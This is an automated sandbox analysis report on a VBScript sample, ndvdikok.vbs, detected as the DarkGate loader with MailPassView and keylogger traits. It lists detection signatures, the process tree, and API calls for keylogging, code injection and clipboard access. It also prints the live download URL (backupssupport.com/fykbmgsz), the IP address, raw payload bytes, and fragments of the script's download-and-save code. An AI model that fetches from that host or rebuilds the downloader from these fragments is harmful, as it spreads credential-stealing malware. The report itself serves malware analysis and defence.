Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ndvdikok.vbs

Overview

General Information

Sample name:ndvdikok.vbs
Analysis ID:1427163
MD5:32f61baa669991fb989439babaf493ff
SHA1:4242d545077e3e643854e3148e00c8283533b9ab
SHA256:75db6f949461cb03a155dd26c781a3c9e00edb917275f3b4d306b7094ed06a14
Tags:DarkGatevbs
Infos:

Detection

DarkGate, MailPassView
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Benign windows process drops PE files
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Yara detected DarkGate
Yara detected MailPassView
Contains functionality to inject code into remote processes
Contains functionality to inject threads in other processes
Contains functionality to register a low level keyboard hook
Potential malicious VBS script found (has network functionality)
Sample or dropped binary is a compiled AutoHotkey binary
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
AV process strings found (often used to terminate AV products)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found evaded block containing many API calls
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries information about the installed CPU (vendor, model number etc)
Queries the product ID of Windows
Queries the volume information (name, serial number etc) of a device
Sigma detected: Script Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Yara detected Keylogger Generic

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 6640 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ndvdikok.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • AutoHotkey.exe (PID: 6544 cmdline: "C:\NwiQ\Autohotkey.exe" "c:\NwiQ\script.ahk" MD5: A59A2D3E5DDA7ACA6EC879263AA42FD3)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DarkGateFirst documented in 2018, DarkGate is a commodity loader with features that include the ability to download and execute files to memory, a Hidden Virtual Network Computing (HVNC) module, keylogging, information-stealing capabilities, and privilege escalation. DarkGate makes use of legitimate AutoIt files and typically runs multiple AutoIt scripts. New versions of DarkGate have been advertised on a Russian language eCrime forum since May 2023.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.darkgate

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.1665821526.00000000048AA000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_DarkGateYara detected DarkGateJoe Security
    00000001.00000002.1665821526.0000000004840000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_MailPassViewYara detected MailPassViewJoe Security
      Process Memory Space: AutoHotkey.exe PID: 6544JoeSecurity_MailPassViewYara detected MailPassViewJoe Security
        Process Memory Space: AutoHotkey.exe PID: 6544JoeSecurity_DarkGateYara detected DarkGateJoe Security
          Process Memory Space: AutoHotkey.exe PID: 6544JoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Script Initiated Connection to Non-Local Network
            Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 205.234.201.153, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 6640, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730
            Sigma detected: WScript or CScript Dropper
            Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ndvdikok.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ndvdikok.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ndvdikok.vbs", ProcessId: 6640, ProcessName: wscript.exe
            Sigma detected: Script Initiated Connection
            Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 205.234.201.153, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 6640, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730
            Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
            Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ndvdikok.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ndvdikok.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ndvdikok.vbs", ProcessId: 6640, ProcessName: wscript.exe

            Snort Signatures

            No Snort rule has matched

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Multi AV Scanner detection for submitted file
            Source: ndvdikok.vbsVirustotal: Detection: 15%Perma Link
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_00480DC0 _wcschr,_wcschr,_wcschr,FindFirstFileW,FindClose,_wcschr,FindFirstFileW,FindClose,1_2_00480DC0
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0045E220 _wcschr,_wcschr,GetFileAttributesW,FindFirstFileW,FindClose,CoInitialize,CoCreateInstance,CoUninitialize,1_2_0045E220
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0047C320 FindFirstFileW,FindClose,GetFileAttributesW,CreateFileW,WriteFile,WriteFile,WriteFile,CloseHandle,1_2_0047C320
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0044D570 FindFirstFileW,GetTickCount,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,GetLastError,FindFirstFileW,GetTickCount,GetTickCount,PeekMessageW,GetTickCount,__swprintf,FindNextFileW,FindClose,1_2_0044D570
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0044D870 FindFirstFileW,GetLastError,FindClose,FileTimeToLocalFileTime,1_2_0044D870
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_00437B70 FindFirstFileW,FindNextFileW,FindClose,FindNextFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindClose,1_2_00437B70
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0044DBB0 CreateFileW,GetFileSizeEx,CloseHandle,FindFirstFileW,GetLastError,FindClose,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,1_2_0044DBB0
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_00480D30 FindFirstFileW,FindClose,GetFileAttributesW,1_2_00480D30
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0045EEA0 GetFullPathNameW,GetFullPathNameW,GetFullPathNameW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,FindFirstFileW,GetLastError,_wcsrchr,_wcsrchr,_wcsncpy,GetTickCount,PeekMessageW,GetTickCount,MoveFileW,DeleteFileW,MoveFileW,GetLastError,CopyFileW,GetLastError,FindNextFileW,FindClose,1_2_0045EEA0
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_048495A1 FindFirstFileA,GetLastError,1_2_048495A1
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0489C541 FindFirstFileW,FindNextFileW,FindClose,1_2_0489C541
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0484655D GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,1_2_0484655D
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0489B145 FindFirstFileW,lstrcmpW,lstrcmpW,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FindNextFileW,FindClose,1_2_0489B145
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_04876FE5 FindFirstFileW,FindNextFileW,FindClose,1_2_04876FE5
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_04873871 FindFirstFileW,FindNextFileW,FindClose,1_2_04873871

            Networking

            barindex
            System process connects to network (likely due to code injection or exploit)
            Source: C:\Windows\System32\wscript.exeNetwork Connect: 205.234.201.153 80Jump to behavior
            Potential malicious VBS script found (has network functionality)
            Source: Initial file: stream.Write xmlhttp.ResponseBody
            Source: Initial file: stream.SaveToFile zipFile, 2
            Source: Joe Sandbox ViewASN Name: SERVERCENTRALUS SERVERCENTRALUS
            Source: global trafficHTTP traffic detected: GET /fykbmgsz HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: backupssupport.comConnection: Keep-Alive
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0045DB90 __wcstoi64,InternetOpenW,InternetOpenUrlW,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetReadFile,InternetReadFile,GetTickCount,GetTickCount,PeekMessageW,GetTickCount,InternetReadFile,InternetReadFileExA,InternetReadFileExA,GetTickCount,GetTickCount,PeekMessageW,GetTickCount,InternetReadFileExA,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,DeleteFileW,1_2_0045DB90
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKConnection: closeContent-Disposition: attachment; filename="fykbmgsz"Content-Type: application/octet-streamContent-Length: 795674Date: Wed, 17 Apr 2024 04:39:55 GMTData Raw: 50 4b 03 04 14 00 00 00 08 00 47 2f 90 58 5b 96 81 81 59 ef 04 00 62 8a 0e 00 08 00 00 00 74 65 73 74 2e 74 78 74 ec dd 57 82 dc 38 d2 36 ea 2d a5 37 97 69 f7 bf a4 ff 79 03 00 93 64 55 69 ba 5b fa 6e ce 11 67 5a 95 34 70 81 f0 08 04 ae 9b d7 f5 7e dd ec 37 75 1d f7 e7 c3 e9 75 3a 9c 77 87 ed e9 78 dc 9d 4e 87 cb e9 76 da 9d cf c7 eb e9 7c 7a 1d de a7 f7 f9 7a da 1f ee 87 dd f1 76 dc 1d ee be d9 1f 5d e7 db e9 78 be 1c 6e 7e 1e 0e c7 e3 e6 b0 3b 9c cf a7 f3 e5 f4 3e 5d 0e 8f f3 e1 f0 38 6e fd 7e 9d 77 c7 fd e9 7a be 1d 8e e7 cd 69 ef 8b 83 ef b6 fe d9 1e 8f a7 f3 f9 a6 d6 f3 49 0b 6a 79 7b 73 3b f8 52 5d 97 f3 f9 f0 54 ff eb bc 3f ec ce 1b ff 1e 4e 5b ad 9c 8f 97 e3 e9 f0 f6 46 dd a7 e7 e9 a8 c7 c7 d3 d6 3f bb e3 f6 7c 3d e6 7f db 73 be b8 2a 77 3e 6f 34 b2 d5 c6 e1 f0 3a ec 4e 8f d3 f1 b0 37 c2 a7 2f d3 a3 83 5f 19 d5 f6 b0 3f 3d b5 fc 36 a6 ab 77 e7 c3 f9 74 3b fa ce 38 33 d8 8b 3a ae fa e2 d6 7f 5e d6 97 27 6d 5c b5 bf 3b 5d 3d d3 83 f3 4e 6d 5b ed ee 4e 97 7c 0f 76 e0 73 78 6a 0b fc f4 f6 0d 26 7a a3 0f cf d3 e3 bc 37 f2 fd e1 71 7a 1f 4e a7 8b 96 b7 81 b6 fe 6e d4 7b 3c bd 34 b6 3f de 40 ed 7e 3a 1c ee 46 6b 16 8e 1b d0 bd 83 77 5a 3d 98 99 9d 91 f9 e1 e9 13 fc 2e 6a 07 22 b3 ba 35 19 ef c3 2d 6d 1a cc e6 f0 30 49 fb b3 06 f5 e0 60 66 77 a7 bb 9a 5f 7a 0e aa a7 cb 79 7f ba 99 9b bd 12 67 90 ba 64 56 40 52 1b d5 eb 93 39 7c 7b 72 3b 5c cf 7b 50 3d e8 6d 00 b3 3d 99 f5 63 5a d9 a9 65 7b 7a 80 d1 01 1c 55 a2 d7 b0 c2 28 dd 9b 85 73 da cd ec e8 d9 cd bb 07 18 1a 51 f5 e5 76 3a a9 67 0b ca d7 93 59 53 ea 06 03 9e c7 3d 58 04 1f 1f a0 70 32 73 77 f0 79 18 b7 59 02 6b 68 62 5c cf 63 46 73 04 ed 07 bc bd 9b b1 dd c9 d8 33 02 35 de c0 34 3d ba 1e f6 66 62 a3 67 70 1d b6 99 e3 60 a0 d9 3f fb ef 62 16 6f e6 ec ae ce bd d1 6b d4 17 17 6d 2a ea a9 1f ea 85 15 c1 06 94 f2 76 77 86 4b fa 95 b9 86 ab f0 c0 f8 bc 07 89 bd 12 57 7d cd dc 1c f5 ca 1d 38 1f 03 25 75 9a d8 d3 3d 7d 05 37 d0 33 96 bd 71 6f 8c e1 72 b8 a0 41 14 a5 b7 3e 52 5b cd d1 11 36 a4 9f 07 a3 82 5f 27 33 a9 ee 33 04 f0 df 43 af 6e 85 05 70 d7 9c 9d 82 6b 6a f3 ce ac 67 8a 36 46 7c d5 ca 3b 33 a4 b4 17 7a fd ce dc 86 32 43 51 60 fe 38 83 6e e6 52 cd d7 70 80 cc a6 de 18 97 f7 f7 c3 bd f8 c3 53 79 50 28 2a ce 9c 43 cb 20 94 3a 02 af e0 b0 ba 35 7c 41 51 ef 43 e8 f9 84 83 dc 71 12 f8 a2 b6 bb 96 15 68 b3 ab 5e a3 3a df 42 05 30 69 03 33 e0 77 b8 0d 6a 3c 99 cf 8b 52 af d4 8f 56 3c 29 1e 84 9a 60 56 6a 7e 80 85 fe ab f5 04 ef 40 0c ec ef 50 01 a6 64 9e b5 b5 87 75 a1 42 68 17 2c 30 b2 d0 0a 8a 0a f4 c0 1a ef f0 dd de 2c bc 60 4c 66 d8 4c 64 ca 81 2d df 81 b7 6f 2f b0 0c a0 e1 fb 49 79 9c 06 3e 6d 8a 77 e9 ab 59 0b be bc c1 2b 13 bb 33 af 46 a9 c5 5b 28 0b a6 ee 7c a1 f6 1a 5f 28 46 33 b0 cd 07 fe 87 bf 99 11 dc cc 13 d8 a9 e4 0e dc 0e fe 85 73 6a 3d e8 a1 5a 8f ba e9 ab 83 36 f0 9a f0 02 fc 29 bc
            Source: global trafficHTTP traffic detected: GET /fykbmgsz HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: backupssupport.comConnection: Keep-Alive
            Source: unknownDNS traffic detected: queries for: backupssupport.com
            Source: wscript.exe, 00000000.00000002.1660300685.000001D5A3ECA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1660138257.000001D5A3D19000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1658115436.000001D5A5B32000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1655827819.000001D5A3D13000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1658042445.000001D5A3C9E000.00000004.00000020.00020000.00000000.sdmp, ndvdikok.vbsString found in binary or memory: http://backupssupport.com/fykbmgsz
            Source: wscript.exe, 00000000.00000003.1655755076.000001D5A3CE7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1660138257.000001D5A3D19000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1655827819.000001D5A3D13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://backupssupport.com/fykbmgsz6
            Source: wscript.exe, 00000000.00000003.1656750950.000001D5A3C95000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1659182934.000001D5A3C9F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1658042445.000001D5A3C9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://backupssupport.com/fykbmgszj
            Source: AutoHotkey.exe, AutoHotkey.exe, 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp, AutoHotkey.exe, 00000001.00000000.1655102872.00000000004AD000.00000002.00000001.01000000.00000008.sdmp, AutoHotkey.exe.0.drString found in binary or memory: https://autohotkey.com
            Source: AutoHotkey.exe, 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp, AutoHotkey.exe, 00000001.00000000.1655102872.00000000004AD000.00000002.00000001.01000000.00000008.sdmp, AutoHotkey.exe.0.drString found in binary or memory: https://autohotkey.comCould
            Source: wscript.exe, 00000000.00000002.1660535194.000001D5A5EE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            barindex
            Contains functionality to register a low level keyboard hook
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0040E820 SetWindowsHookExW 0000000D,Function_00009EA0,00400000,000000001_2_0040E820
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_00405430 GetTickCount,IsClipboardFormatAvailable,GetTickCount,OpenClipboard,OpenClipboard,GetTickCount,OpenClipboard,1_2_00405430
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_00405160 EmptyClipboard,GlobalUnlock,CloseClipboard,GlobalUnlock,GlobalUnlock,GlobalFree,GlobalUnlock,CloseClipboard,SetClipboardData,GlobalUnlock,CloseClipboard,1_2_00405160
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_00483160 EmptyClipboard,GlobalUnlock,CloseClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalUnlock,CloseClipboard,GlobalFree,GlobalUnlock,CloseClipboard,1_2_00483160
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_00405330 GetClipboardFormatNameW,__wcsnicmp,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,GetClipboardData,1_2_00405330
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_004442E0 GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,_wcsrchr,__wcsicoll,__wcsicoll,__wcsicoll,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,__wcsnicmp,__fassign,__wcsnicmp,_wcsncpy,__fassign,__fassign,__fassign,__fassign,GetDC,DestroyIcon,DeleteObject,DeleteObject,GetIconInfo,DeleteObject,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,ReleaseDC,DeleteObject,SelectObject,DeleteDC,DeleteObject,_free,_free,_free,1_2_004442E0
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_00416010 GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetTickCount,1_2_00416010
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_004014E4 GlobalUnlock,CloseClipboard,SetTimer,GetTickCount,GetTickCount,GetMessageW,GetTickCount,GetFocus,TranslateAcceleratorW,GetKeyState,GetWindowLongW,IsWindowEnabled,GetKeyState,GetKeyState,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,IsDialogMessageW,ShowWindow,GetForegroundWindow,GetWindowThreadProcessId,GetClassNameW,KillTimer,DragQueryFileW,DragFinish,GetTickCount,DragFinish,DragFinish,_wcsncpy,_wcsncpy,GetTickCount,_wcsncpy,GetTickCount,IsDialogMessageW,SetCurrentDirectoryW,TranslateAcceleratorW,TranslateMessage,DispatchMessageW,1_2_004014E4
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_00418140 GetKeyState,GetKeyState,GetKeyState,GetForegroundWindow,GetWindowThreadProcessId,GetKeyState,1_2_00418140
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_00414870 __wcsnicmp,__wcsnicmp,GetWindowThreadProcessId,AttachThreadInput,GetTickCount,GetCurrentThreadId,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetGUIThreadInfo,GetWindowThreadProcessId,GetKeyboardLayout,GetTickCount,BlockInput,GetTickCount,GetTickCount,PeekMessageW,GetTickCount,_wcschr,_wcschr,__wcsnicmp,__wcsnicmp,_wcschr,__wcsnicmp,__wcsnicmp,__wcsnicmp,__wcsnicmp,__wcsnicmp,__wcsicoll,PostMessageW,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetTickCount,GetTickCount,PeekMessageW,GetTickCount,__wcsnicmp,__wcsnicmp,__fassign,PostMessageW,PostMessageW,PostMessageW,__itow,PostMessageW,_free,GetTickCount,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetTickCount,GetKeyState,GetKeyState,GetKeyState,GetForegroundWindow,GetWindowThreadProcessId,AttachThreadInput,BlockInput,GetForegroundWindow,GetWindowThreadProcessId,1_2_00414870
            Source: Yara matchFile source: Process Memory Space: AutoHotkey.exe PID: 6544, type: MEMORYSTR
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0487357D CreateDesktopA,CreateProcessA,CreateProcessA,CreateProcessA,CreateProcessA,WaitForSingleObject,1_2_0487357D

            System Summary

            barindex
            Sample or dropped binary is a compiled AutoHotkey binary
            Source: C:\NwiQ\AutoHotkey.exeWindow found: window name: AutoHotkeyJump to behavior
            Windows Scripting host queries suspicious COM object (likely to drop second stage)
            Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
            Source: C:\Windows\System32\wscript.exeCOM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{13709620-C279-11CE-A49E-444553540000}Jump to behavior
            Source: C:\Windows\System32\wscript.exeCOM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}Jump to behavior
            Source: C:\Windows\System32\wscript.exeCOM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}Jump to behavior
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_04895009 Sleep,TerminateThread,NtClose,NtClose,1_2_04895009
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_04894C89 NtDuplicateObject,NtClose,1_2_04894C89
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_04894CBD NtQueryObject,NtQueryObject,1_2_04894CBD
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_04894D15 NtOpenProcess,1_2_04894D15
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_04894D65 NtQuerySystemInformation,NtDuplicateObject,NtClose,NtClose,NtClose,NtClose,NtClose,NtClose,NtClose,1_2_04894D65
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0486A8DD GetCurrentProcessId,OpenProcess,InitializeProcThreadAttributeList,GetProcessHeap,RtlAllocateHeap,InitializeProcThreadAttributeList,UpdateProcThreadAttribute,CreateProcessA,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,WriteProcessMemory,ResumeThread,Sleep,GetTickCount,1_2_0486A8DD
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0486ABFD GetCurrentProcessId,CreateProcessA,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,WriteProcessMemory,ResumeThread,Sleep,GetTickCount,1_2_0486ABFD
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_00449B70: __swprintf,CreateFileW,DeviceIoControl,CloseHandle,1_2_00449B70
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0045F410 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,1_2_0045F410
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_004014E41_2_004014E4
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_004517E01_2_004517E0
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_004260F01_2_004260F0
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0042A3C01_2_0042A3C0
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0040D3F01_2_0040D3F0
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_004A23BC1_2_004A23BC
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_004A654C1_2_004A654C
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_004115701_2_00411570
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0048E6301_2_0048E630
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0040D6C01_2_0040D6C0
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_004A18651_2_004A1865
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_004148701_2_00414870
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0041F8001_2_0041F800
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_004298001_2_00429800
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0047F8001_2_0047F800
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_00443AD01_2_00443AD0
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_004A6A9D1_2_004A6A9D
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_00423B301_2_00423B30
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_00438B301_2_00438B30
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_004A7BE91_2_004A7BE9
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_00411BB01_2_00411BB0
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0049CBB81_2_0049CBB8
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_004A9CDE1_2_004A9CDE
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_00419E611_2_00419E61
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_00412E601_2_00412E60
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_00419E601_2_00419E60
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_00401EF41_2_00401EF4
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_004260F01_2_004260F0
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0043BFE01_2_0043BFE0
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0486A0F51_2_0486A0F5
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0488E0091_2_0488E009
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_048662511_2_04866251
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0488CA211_2_0488CA21
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_04881A511_2_04881A51
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_048AD8261_2_048AD826
            Source: Joe Sandbox ViewDropped File: C:\NwiQ\AutoHotkey.exe 897B0D0E64CF87AC7086241C86F757F3C94D6826F949A1F0FEC9C40892C0CECB
            Source: C:\NwiQ\AutoHotkey.exeCode function: String function: 04875E39 appears 33 times
            Source: C:\NwiQ\AutoHotkey.exeCode function: String function: 00480050 appears 42 times
            Source: C:\NwiQ\AutoHotkey.exeCode function: String function: 04845251 appears 76 times
